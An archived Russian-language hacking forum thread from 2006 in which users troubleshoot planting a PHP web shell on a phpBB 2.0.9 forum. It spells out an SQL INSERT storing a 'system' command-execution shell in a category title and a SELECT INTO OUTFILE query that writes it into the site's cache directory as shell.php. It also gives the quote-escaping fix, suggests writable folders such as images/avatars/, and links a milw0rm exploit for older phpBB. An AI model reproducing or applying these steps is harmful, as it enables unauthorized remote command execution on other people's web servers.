Заливка шелла в phpBB 2.0.9 через SQL [Архив]

Просмотр полной версии : Заливка шелла в phpBB 2.0.9 через SQL

bandera

05.06.2006, 13:29

Почему вылетает такая ошибка при востонавлениие БД. Что можно сделать.

Error importing backup file DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'cmd']); ?>', '10')' at line 1 INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '', '10') Line : 980 File : /home/xxxxx/public_html/forum/admin/admin_db_utilities.php

Rebz

05.06.2006, 13:34

'cmd']); ?> - это что такое?)) шелл напоминает наполовину)

смотри таблицу phpbb_categories. Смотри значения таблицы..скорее всего в ней дело. точно не знаю.

bandera

05.06.2006, 13:49

'cmd']); ?> - это что такое?)) шелл напоминает наполовину)

Да не это ошибка так вылетает:
Писал всё правильно.

INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? system(GET['cmd']); ?>', '10');

Потом:
SELECT cat_title INTO OUTFILE '/home/xxxx/public_html/forum/cache/shell.php' FROM phpbb_categories where cat_id=1;

Не пойму чо за хрень такая...

смотри таблицу phpbb_categories. Смотри значения таблицы..скорее всего в ней дело. точно не знаю.

Нет таблица стандартная.

GreenBear

05.06.2006, 13:54

INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? system(GET['cmd']); ?>', '10');
Говорят если ковычки заслешировать - поможет.
<? system(GET[\'cmd\']); ?>

GreenBear

05.06.2006, 14:06

Ну дальше то что? Заслешировать то все равно надо.
Запрос к мускулу идет не правильный, хоть отедльный запрос, хоть востановление из бэкапа.

bandera

05.06.2006, 14:10

Green_Bear сэнкс помогло=)

Теперь другая проблема - какая папка ещё может быть доступна для записи? А то Access denied =)

GreenBear

05.06.2006, 14:20

images/avatars/

bandera

05.06.2006, 14:33

images/avatars/
не некатит (странно чо за хрень) ещё может что нибудь быть?

bandera

05.06.2006, 14:36

Вопрос вот по этому сплойту для пхпбб <2.0.10:
http://milw0rm.com/id.php?id=647
его исправлять надо или что, а то у меня лампочка на модеме не моргнула даже, а он пишет cant connect.

SK | Heaton

06.06.2006, 14:43

images/avatars/ это папка доступна для записи просто это папка стоит на фильтрации зависимо от типа файлов и размера.

Tem

06.06.2006, 14:51

Она не всегда доступна, можна и выложить прова на него.

SK | Heaton

06.06.2006, 15:02

Она не всегда доступна, можна и выложить прова на него.
ну если админ уберет доступ она и будет не достепна

Tem

06.06.2006, 15:12

или если туда акссес закинит )

qBiN

06.06.2006, 19:19

Итак соучаснеги я опять закрою эту тему.
google_it:sql docs OR sql
forum_seach:sql
Информации по sql очень много,тем более что сервер дает описание ошибки.
Тема закрыта.Автору минус.